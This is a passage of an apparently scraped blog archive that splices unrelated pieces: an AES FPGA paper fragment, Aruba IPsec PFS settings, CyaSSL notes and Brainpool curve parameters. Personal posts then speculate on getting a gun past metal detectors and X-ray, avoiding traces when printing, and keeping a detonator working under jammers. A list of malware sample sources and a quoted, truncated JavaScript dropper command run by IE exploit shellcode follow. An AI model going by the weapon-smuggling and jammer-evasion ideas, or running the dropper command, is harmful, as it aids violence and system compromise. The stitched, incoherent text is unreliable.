ShiftRow and InvShiftRow change the order of bytes within a 16 byte (128
bit) word. Both transformations involve only changing the order of
signals, and therefore they can be implemented using routing only, and
do not require any logic resources, such as Configurable Logic Blocks
(CLBs) or dedicated RAM. MixColumn / InvMixColumn influences usually the
cipher area very much. Therefore, we proceeded further with the
resource sharing for these blocks. In order to significantly decrease
the area of MixColumn / InvMixColumn , a joint implementation described
in detail in the Ref. [19] is proposed in Fig. 5. The four inputs and
four outputs represent single bytes. Four identical blocks like that one
shown in Fig. 5, constitute the MixColumn block diagram. KeyAddition is
a bitwise XOR of two 128 bit words. The implementation of the
encryption and decryption combined unit is shown in Fig. 6. It requires
realization of five component operations: Substitution , ShiftRow ,
InvShiftRow , MixColumn , and KeyAddition . The values of the selection
signals selEncDec , selData , selMode , and selReg for the multiplexers
are also described. The architecture shown in Fig. 6 is very compact and
is based on the resource sharing for two blocks Substitution and
MixColumn in order to achieve minimum area of the circuit. It has been
proven from simulations and further on from implementation that by using
the resource sharing of these blocks the area of the circuit is with
16% less. ShiftRow and InvShiftRow do not require any logic resources in
FPGA implementation. The Rijndael cipher in OCB/ECB modes of operation
was first described in Verilog, and his description verified using the
Verilog-XL simulator from Cadence Design Systems. Test vectors from the
reference software implementations were used for debugging and
verification of Verilog codes. The revised Verilog code became an input
to Xilinx ISE Series 4.1 i software performing the logic synthesis,
mapping, placing, and routing. In order to fit the whole circuit in one
FPGA device Virtex II XC2V1000-4, the option for the Xilinx ISE Series
4.1 i software was set to small area and the design has been flatten.
These tools generated reports describing the area and speed of
implementation, a netlist used for timing simulations, and a bitstream
to be used to program the FPGA device Virtex II XC2V1000-4 [22]. The
software [23] used to provide test vectors for OCB mode of operation was
written in C and C CC and is available at Rogaway’s home page. The test
vectors as well as the variables of a pipeline with five inputs ( n Z 5
in Fig. 3) containing 74 blocks of data encrypted in OCB are
represented in Fig. 7. For simplicity, key, nonce, and plaintext are all
set to zero. The timing simulation results of the test vectors were
performed with the key KeyIn [0:15] and the input Input [0:15] set to
zero, as shown in Fig. 8. ModeOperation and EncDec are ‘1/0’ logic for
OCB/ECB and encryption/ decryption, respectively. Length [4:0] shows the
number of remaining blocks of data and Counter [11:0] displays the
number of packages. The maximum number of packages transmitted in WLANs
is 4095 and therefore 12 bits are needed for coding. NewKey is ‘1’ logic
whenever is desired to load an external key. The reset of the circuit
is synchronous through reset while start and done are part of the
handshaking protocol. In order to program the FPGA, a SUN workstation
was connected to the Insight Virtex II Development Kit board [24]. The
board was connected to the Logic Analysis System Agilent 16702B [25]
which provided and displayed signals during measurements. The
experimental results are shown in Fig. 9. The results of the FPGA
implementation are summarized in Table 1. The throughput of the circuit
in OCB mode is given by:
Saturday, October 1, 2016
What is the use of PFS(Perfect Forward Secrecy) in IPSEC tunnel and how to enable it on the Aruba controller ?
How to check PFS is enabeld or disabled:
(Aruba7210) #show crypto-local ipsec-map
Crypto Map Template"test" 100
IKE Version: 1
IKEv1 Policy: All
Security association lifetime seconds : [300 -86400]
Security association lifetime kilobytes: N/A
PFS (Y/N): N <-- disabled="" here="" is="" pfs="" span="">-->
Transform sets={ default-transform }
Peer gateway: 0.0.0.0
Interface: VLAN 0
Source network: 0.0.0.0/0.0.0.0
Destination network: 0.0.0.0/0.0.0.0
Pre-Connect (Y/N): N
Tunnel Trusted (Y/N): N
Forced NAT-T (Y/N): N
How to enable PFS for IPSEC tunnel:
(Aruba7210) #configure terminal
(Aruba7210) (config) #crypto-local ipsec-map test 100
(Aruba7210) (config-ipsec-map)# set pfs
Note: If we decide to enable PFS(As a additional Security for
IPSEC tunnel), then we need to enable it on both the end(Initiator and
Responder).
ipsec: pfs ecc brainpool curve support
https://git.immersenetworks.com/immerse-networks-limited/pfsense/commit/b8e6729f245ebe84b036321fb4f37c5bd6826e2c
Using Supported Elliptic Curves Extension with CyaSSL
Using Supported Elliptic Curves Extension with CyaSSL
We are back to talk about TLS extensions again. Today we present the addition of Supported Elliptic Curves on CyaSSL!
RFC 4492 introduces five new ECC-based key
exchange algorithms for TLS: ECDH_ECDSA, ECDHE_ECDSA, ECDH_RSA,
ECDHE_RSA and ECDH_anon. However, it may be desirable in constrained
environments to only support a limited number of curves. When a client
uses this extension, servers that understands it MUST NOT negotiate the
use of an ECC cipher suite unless they can complete the handshake while
respecting the choice of curves specified by the client. This eliminates
the possibility that a negotiated ECC handshake will be subsequently
aborted due to a client’s inability to deal with the server’s ECC key.
To enable the usage of Supported Elliptic Curves in CyaSSL you can simply do:
./configure --enable-supportedcurves
Using Supported Elliptic Curves on the
client side requires additional function calls, which should be one of
the following functions:
CyaSSL_CTX_UseSupportedCurve();
CyaSSL_UseSupportedCurve();
CyaSSL_CTX_UseSupportedCurve() is most
recommended when the client would like to enable Supported Curves for
all sessions. Setting the Supported Elliptic Curves extension at context
level will enable it in all SSL objects created from that same context
from the moment of the call forward.
CyaSSL_UseSupportedCurve() will enable it
for one SSL object only, so it's recommended to use this function when
there is no need for Supported Elliptic Curves on all sessions.
These functions can be called more than once to indicate the support of multiple curves.
On the server side no call is required. The
server will automatically attend to the client's request selecting ECC
cipher suites only if the supported curves are allowed.
All TLS extensions can also be enabled with:
./configure --enable-tlsx
Mercurial > prosody-modules / files
files
/mod_s2s_keysize_policy/ default tip
drwxr-xr-x | [up] | |||
-rw-r--r-- | 2016-10-01 01:09 +0200 | 1175 | README.markdown | file | revisions | annotate |
-rw-r--r-- | 2016-10-01 01:09 +0200 | 1512 | mod_s2s_keysize_policy.lua | file | revisions | annotate |
https://hg.prosody.im/prosody-modules/file/tip/mod_s2s_keysize_policy |
The methods for the generation of the parameters and complete security
proofs regarding the security requirements specified in section 2.1
are given in [EBP].
3.1 Parameters for 160 bit curves
Curve-ID: brainpoolP160r1
p = E95E4A5F737059DC60DFC7AD95B3D8139515620F
A = 340E7BE2A280EB74E2BE61BADA745D97E8F7C300
B = 1E589A8595423412134FAA2DBDEC95C8D8675E58
x = BED5AF16EA3F6A4F62938C4631EB5AF7BDBCDBC3
y = 1667CB477A1A8EC338F94741669C976316DA6321
q = E95E4A5F737059DC60DF5991D45029409E60FC09
h = 1
#Twisted curve
Curve-ID: brainpoolP160t1
Z = 24DBFF5DEC9B986BBFE5295A29BFBAE45E0F5D0B
A' = E95E4A5F737059DC60DFC7AD95B3D8139515620C
B' = 7A556B6DAE535B7B51ED2C4D7DAA7A0B5C55F380
x = B199B13B9B34EFC1397E64BAEB05ACC265FF2378
y = ADD6718B7C7C1961F0991B842443772152C9E0AD
q = E95E4A5F737059DC60DF5991D45029409E60FC09
h = 1
3.2 Parameters for 192 bit curves
Curve-ID: brainpoolP192r1
p = C302F41D932A36CDA7A3463093D18DB78FCE476DE1A86297
A = 6A91174076B1E0E19C39C031FE8685C1CAE040E5C69A28EF
B = 469A28EF7C28CCA3DC721D044F4496BCCA7EF4146FBF25C9
x = C0A0647EAAB6A48753B033C56CB0F0900A2F5C4853375FD6
y = 14B690866ABD5BB88B5F4828C1490002E6773FA2FA299B8F
q = C302F41D932A36CDA7A3462F9E9E916B5BE8F1029AC4ACC1
h = 1
#Twisted curve
Curve-ID: brainpoolP192t1
Z = 1B6F5CC8DB4DC7AF19458A9CB80DC2295E5EB9C3732104CB
A' = C302F41D932A36CDA7A3463093D18DB78FCE476DE1A86294
B' = 13D56FFAEC78681E68F9DEB43B35BEC2FB68542E27897B79
x = 3AE9E58C82F63C30282E1FE7BBF43FA72C446AF6F4618129
y = 97E2C5667C2223A902AB5CA449D0084B7E5B3DE7CCC01C9
q = C302F41D932A36CDA7A3462F9E9E916B5BE8F1029AC4ACC1
h = 1
3.3 Parameters for 224 bit curves
Curve-ID: brainpoolP224r1
p = D7C134AA264366862A18302575D1D787B09F075797DA89F57EC8C0FF
A = 68A5E62CA9CE6C1C299803A6C1530B514E182AD8B0042A59CAD29F43
B = 2580F63CCFE44138870713B1A92369E33E2135D266DBB372386C400B
x = D9029AD2C7E5CF4340823B2A87DC68C9E4CE3174C1E6EFDEE12C07D
y = 58AA56F772C0726F24C6B89E4ECDAC24354B9E99CAA3F6D3761402CD
q = D7C134AA264366862A18302575D0FB98D116BC4B6DDEBCA3A5A7939F
h = 1
#Twisted curve
Curve-ID: brainpoolP224t1
Z = 2DF271E14427A346910CF7A2E6CFA7B3F484E5C2CCE1C8B730E28B3F
A' = D7C134AA264366862A18302575D1D787B09F075797DA89F57EC8C0FC
B' = 4B337D934104CD7BEF271BF60CED1ED20DA14C08B3BB64F18A60888D
x = 6AB1E344CE25FF3896424E7FFE14762ECB49F8928AC0C76029B4D580
y = 374E9F5143E568CD23F3F4D7C0D4B1E41C8CC0D1C6ABD5F1A46DB4C
q = D7C134AA264366862A18302575D0FB98D116BC4B6DDEBCA3A5A7939F
h = 1
3.4 Parameters for 256 bit curves
Curve-ID: brainpoolP256r1
p = A9FB57DBA1EEA9BC3E660A909D838D726E3BF623D52620282013481D1F6E5377
A = 7D5A0975FC2C3057EEF67530417AFFE7FB8055C126DC5C6CE94A4B44F330B5D9
B = 26DC5C6CE94A4B44F330B5D9BBD77CBF958416295CF7E1CE6BCCDC18FF8C07B6
x = 8BD2AEB9CB7E57CB2C4B482FFC81B7AFB9DE27E1E3BD23C23A4453BD9ACE3262
y = 547EF835C3DAC4FD97F8461A14611DC9C27745132DED8E545C1D54C72F046997
q = A9FB57DBA1EEA9BC3E660A909D838D718C397AA3B561A6F7901E0E82974856A7
h = 1
#Twisted curve
Curve-ID: brainpoolP256t1
Z = 3E2D4BD9597B58639AE7AA669CAB9837CF5CF20A2C852D10F655668DFC150EF0
A' = A9FB57DBA1EEA9BC3E660A909D838D726E3BF623D52620282013481D1F6E5374
B' = 662C61C430D84EA4FE66A7733D0B76B7BF93EBC4AF2F49256AE58101FEE92B04
x = A3E8EB3CC1CFE7B7732213B23A656149AFA142C47AAFBC2B79A191562E1305F4
y = 2D996C823439C56D7F7B22E14644417E69BCB6DE39D027001DABE8F35B25C9BE
q = A9FB57DBA1EEA9BC3E660A909D838D718C397AA3B561A6F7901E0E82974856A7
h = 1
3.5 Parameters for 320 bit curves
Curve-ID: brainpoolP320r1
p =
D35E472036BC4FB7E13C785ED201E065F98FCFA6F6F40DEF4F92B9EC7893EC28FCD412
B1F1B32E27
A =
3EE30B568FBAB0F883CCEBD46D3F3BB8A2A73513F5EB79DA66190EB085FFA9F492F375
A97D860EB4
B =
520883949DFDBC42D3AD198640688A6FE13F41349554B49ACC31DCCD884539816F5EB4
AC8FB1F1A6
x =
43BD7E9AFB53D8B85289BCC48EE5BFE6F20137D10A087EB6E7871E2A10A599C710AF8D
0D39E20611
y =
14FDD05545EC1CC8AB4093247F77275E0743FFED117182EAA9C77877AAAC6AC7D35245
D1692E8EE1
q =
D35E472036BC4FB7E13C785ED201E065F98FCFA5B68F12A32D482EC7EE8658E9869155
5B44C59311
h = 1
#Twisted curve
Curve-ID: brainpoolP320t1
Z =
15F75CAF668077F7E85B42EB01F0A81FF56ECD6191D55CB82B7D861458A18FEFC3E5AB
7496F3C7B1
A' =
D35E472036BC4FB7E13C785ED201E065F98FCFA6F6F40DEF4F92B9EC7893EC28FCD412
B1F1B32E24
B' =
A7F561E038EB1ED560B3D147DB782013064C19F27ED27C6780AAF77FB8A547CEB5B4FE
F422340353
x =
925BE9FB01AFC6FB4D3E7D4990010F813408AB106C4F09CB7EE07868CC136FFF3357F6
24A21BED52
y =
63BA3A7A27483EBF6671DBEF7ABB30EBEE084E58A0B077AD42A5A0989D1EE71B1B9BC0
455FB0D2C3
q =
D35E472036BC4FB7E13C785ED201E065F98FCFA5B68F12A32D482EC7EE8658E9869155
5B44C59311
h = 1
3.6 Parameters for 384 bit curves
Curve-ID: brainpoolP384r1
p =
8CB91E82A3386D280F5D6F7E50E641DF152F7109ED5456B412B1DA197FB71123ACD3A7
29901D1A71874700133107EC53
A =
7BC382C63D8C150C3C72080ACE05AFA0C2BEA28E4FB22787139165EFBA91F90F8AA581
4A503AD4EB04A8C7DD22CE2826
B =
4A8C7DD22CE28268B39B55416F0447C2FB77DE107DCD2A62E880EA53EEB62D57CB4390
295DBC9943AB78696FA504C11
x =
1D1C64F068CF45FFA2A63A81B7C13F6B8847A3E77EF14FE3DB7FCAFE0CBD10E8E826E0
3436D646AAEF87B2E247D4AF1E
y =
8ABE1D7520F9C2A45CB1EB8E95CFD55262B70B29FEEC5864E19C054FF99129280E4646
217791811142820341263C5315
q =
8CB91E82A3386D280F5D6F7E50E641DF152F7109ED5456B31F166E6CAC0425A7CF3AB6
AF6B7FC3103B883202E9046565
h = 1
#Twisted curve
Curve-ID: brainpoolP384t1
Z =
41DFE8DD399331F7166A66076734A89CD0D2BCDB7D068E44E1F378F41ECBAE97D2D63D
BC87BCCDDCCC5DA39E8589291C
A' =
8CB91E82A3386D280F5D6F7E50E641DF152F7109ED5456B412B1DA197FB71123ACD3A7
29901D1A71874700133107EC50
B' =
7F519EADA7BDA81BD826DBA647910F8C4B9346ED8CCDC64E4B1ABD11756DCE1D2074AA
263B88805CED70355A33B471EE
x =
18DE98B02DB9A306F2AFCD7235F72A819B80AB12EBD653172476FECD462AABFFC4FF19
1B946A5F54D8D0AA2F418808CC
y =
25AB056962D30651A114AFD2755AD336747F93475B7A1FCA3B88F2B6A208CCFE469408
584DC2B2912675BF5B9E582928
q =
8CB91E82A3386D280F5D6F7E50E641DF152F7109ED5456B31F166E6CAC0425A7CF3AB6
AF6B7FC3103B883202E9046565
h = 1
3.7 Parameters for 512 bit curves
Curve-ID: brainpoolP512r1
p =
AADD9DB8DBE9C48B3FD4E6AE33C9FC07CB308DB3B3C9D20ED6639CCA703308717D4D9B
009BC66842AECDA12AE6A380E62881FF2F2D82C68528AA6056583A48F3
A =
7830A3318B603B89E2327145AC234CC594CBDD8D3DF91610A83441CAEA9863BC2DED5D
5AA8253AA10A2EF1C98B9AC8B57F1117A72BF2C7B9E7C1AC4D77FC94CA
B =
3DF91610A83441CAEA9863BC2DED5D5AA8253AA10A2EF1C98B9AC8B57F1117A72BF2C7
B9E7C1AC4D77FC94CADC083E67984050B75EBAE5DD2809BD638016F723
x =
81AEE4BDD82ED9645A21322E9C4C6A9385ED9F70B5D916C1B43B62EEF4D0098EFF3B1F
78E2D0D48D50D1687B93B97D5F7C6D5047406A5E688B352209BCB9F822
y =
7DDE385D566332ECC0EABFA9CF7822FDF209F70024A57B1AA000C55B881F8111B2DCDE
494A5F485E5BCA4BD88A2763AED1CA2B2FA8F0540678CD1E0F3AD80892
q =
AADD9DB8DBE9C48B3FD4E6AE33C9FC07CB308DB3B3C9D20ED6639CCA70330870553E5C
414CA92619418661197FAC10471DB1D381085DDADDB58796829CA90069
h = 1
#Twisted curve
Curve-ID: brainpoolP512t1
Z =
12EE58E6764838B69782136F0F2D3BA06E27695716054092E60A80BEDB212B64E585D9
0BCE13761F85C3F1D2A64E3BE8FEA2220F01EBA5EEB0F35DBD29D922AB
A' =
AADD9DB8DBE9C48B3FD4E6AE33C9FC07CB308DB3B3C9D20ED6639CCA703308717D4D9B
009BC66842AECDA12AE6A380E62881FF2F2D82C68528AA6056583A48F0
B' =
7CBBBCF9441CFAB76E1890E46884EAE321F70C0BCB4981527897504BEC3E36A62BCDFA
2304976540F6450085F2DAE145C22553B465763689180EA2571867423E
x =
640ECE5C12788717B9C1BA06CBC2A6FEBA85842458C56DDE9DB1758D39C0313D82BA51
735CDB3EA499AA77A7D6943A64F7A3F25FE26F06B51BAA2696FA9035DA
y =
5B534BD595F5AF0FA2C892376C84ACE1BB4E3019B71634C01131159CAE03CEE9D99321
84BEEF216BD71DF2DADF86A627306ECFF96DBB8BACE198B61E00F8B332
q =
AADD9DB8DBE9C48B3FD4E6AE33C9FC07CB308DB3B3C9D20ED6639CCA70330870553E5C
414CA92619418661197FAC10471DB1D381085DDADDB58796829CA90069
h = 1
4 Object identifiers for the elliptic curve domain parameters
The root of the tree for the object identifier of the domain
parameters defined in this specification is given by
ecStdCurvesAndGeneration OBJECT IDENTIFIER::= {iso(1)
identifified-organization(3) teletrust(36) algorithm(3)
signature-algorithm(3) ecSign(2) 8}
The object identifier ellipticCurve represents the tree containing the
object identifiers for each set of domain parameters specified in this
RFC. It has the following value:
ellipticCurve OBJECT IDENTIFIER ::= {ecStdCurvesAndGeneration 1}
http://www.ecc-brainpool.org/download/draft-lochter-pkix-brainpool-ecc-00.txt
Thursday, September 29, 2016
I'll start the working day, again with the subject, pass trought metal detector and x ray with a gun! so, we need a chemical conpoundthat diffracts the Cu (curies measure) attraction, and creates a very low thermal reading "Tungsten carbide is often used as ceramic strengthening phase in laser cladded MMC coatings thanks to its combination of high hardness, certain plasticity, good wettability by molten metals and low thermal expansion.." this carbide thermal spraying technique is going to coat the metal with tiny espheres, that because is made on very cold temperatures is going to undercover the metal matrix.
let me ask you something, if you have your own POP3 server relay on your domain, that means besides an email, you can send bots belonging to your own site right? like bryan@yourdomain.com ?
Set
up Gmail to Send/Receive Emails Using Your Own Domain Name - See more
at:
http://www.technologymatters.com.au/set-up-gmail-to-sendreceive-emails-using-your-own-domain-name/#sthash.Ic1r4vmO.dpuf
http://www.technologymatters.com.au/set-up-gmail-to-sendreceive-emails-using-your-own-domain-name/
Wednesday, September 28, 2016
Well, I cant' t go out not only for a coffee, so..I remembered a subject guys that you might like :) you know that they trace back security documents printing, and also trace bak counterfeit money if you just print on your colour laser printer :) yes. let's divide the subject...I have here a pdf that u should read...and take a closer look to the DNA trace, which looks preety amazing, you press the print botton and it scans your DNA that then prints on the sheet...hum..hum...gloves then right?
Tuesday, September 27, 2016
Today's subject how to pass trought an explosive without beeing power cut by their jammer! there's two aspects about it, or two ways to face the problem, first one, determine in which frequency is any electric circuit even not connected to a power source transmitting, so we can determine if it can work on other non detected frequency, what is an undetected frequency, not a lower one, or the detonator won't work of course, or else, how to confuse the jammer.
So, we don't want, for begging of conversation a constant frequency, on
the electric circuit, and we want that the frequency cellphone they
detect have a confusing electronic "agent"...let me post the theory
about what I'm saying:
Many modern microcomputers use a "clock multiplier" which multiplies a lower frequency external clock to the appropriate clock rate of the microprocessor. This allows the CPU to operate at a much higher frequency than the rest of the computer....Some sensitive mixed-signal circuits, such as precision analog-to-digital converters, use sine waves rather than square waves as their clock signals, because square waves contain high-frequency harmonics that can interfere with the analog circuitry and cause noise
...Such digital devices work just as well with a clock generator that dynamically changes its frequency, such as spread-spectrum clock generation, dynamic frequency scaling, PowerNow!, Cool'n'Quiet, SpeedStep, etc (wikipedia)
ANOTHER QUESTION THEREFORE IS:
Many modern microcomputers use a "clock multiplier" which multiplies a lower frequency external clock to the appropriate clock rate of the microprocessor. This allows the CPU to operate at a much higher frequency than the rest of the computer....Some sensitive mixed-signal circuits, such as precision analog-to-digital converters, use sine waves rather than square waves as their clock signals, because square waves contain high-frequency harmonics that can interfere with the analog circuitry and cause noise
...Such digital devices work just as well with a clock generator that dynamically changes its frequency, such as spread-spectrum clock generation, dynamic frequency scaling, PowerNow!, Cool'n'Quiet, SpeedStep, etc (wikipedia)
ANOTHER QUESTION THEREFORE IS:
How can a CPU dynamically change its clock frequency?
BUT MUCH MORE IMPORTANT IS TO CONCLUDE THAT THIS MY BE THE TRICKY:
How can I connect multiple bluetooth devices to a single bluetooth device?
It
is possible within the Bluetooth specification to have a Bluetooth
master device connected to multiple slave devices, but there are limits:
> Prior to Bluetooth spec. rev. 4.1, Slave devices could only be
connected to a single piconet at a time. The reason for this is because
when the connection is initiated, the advertising device must
synchronize it's clock to that of the initiator. So, a slave device
cannot be synchronized to two independent free-running clocks at the
same time, hence the one master per slave limit. Bluetooth 4.1 addresses
this, so a slave device can be connected to two piconets
simultaneously, however I don't know the exact details of how.
> The Bluetooth device you're using must
be running a stack that supports multiple concurrent connections. Many
Bluetooth stacks do support this, but there is a limit on how many
devices can be connected at the same time, and the limit is usually
related to the amount of memory available on the Master device.
> The type of connection you're using must allow for multiple
instances of that connection on a piconet. This is easiest to explain by
example. You can only have a single Bluetooth audio connection for
music streaming. The reason for this is that the A2DP profile for audio
streaming is designed to have only a single connection active at a time.
So you cannot connect your smartphone to two Bluetooth speakers at the
same time.
Given all that, you also need an
interface to the Bluetooth device that allows you to setup multiple
connections. So while this may all be theoretically possible, if the
devices interface/software was not designed to allow for two
connections at a time, you're out of luck.
Monday, September 26, 2016
Malware Sample Sources for Researchers
- Contagio Malware Dump: Free; password required
- Das Malwerk: Free
- KernelMode.info: Free; registration required
- MalShare: Free; registration required
- Malware.lu’s AVCaesar: Free; registration required
- MalwareBlacklist: Free; registration required
- Malware DB: Free
- Malwr: Free; registration required
- Open Malware: Free
- theZoo aka Malware DB: Free
- Virusign: Free
- VirusShare: Free
https://zeltser.com/malware-sample-sources/
Oh look – JavaScript Droppers
One of them is the shellcode from an Internet Explorer exploit, which instead of downloading a binary executes the following CMD command:
Windows/syswow64/cmd.exe cmd.exe /q /c cd /d "%tmp%" && echo var w=g("WScript.Shell"),a=g("Scripting.FileSystemObject"),w1=WScript;try{m=w1.Arguments;u=600;o="***";w1.Sleep(u*u);var n=h(m(2),m(1),m(0));if (n.indexOf(o)^>3){k=n.split(o);l=k[1].split(";");for (var i=0;i^
https://labs.bromium.com/2015/06/12/oh-look-javascript-droppers/
Subscribe to:
Posts (Atom)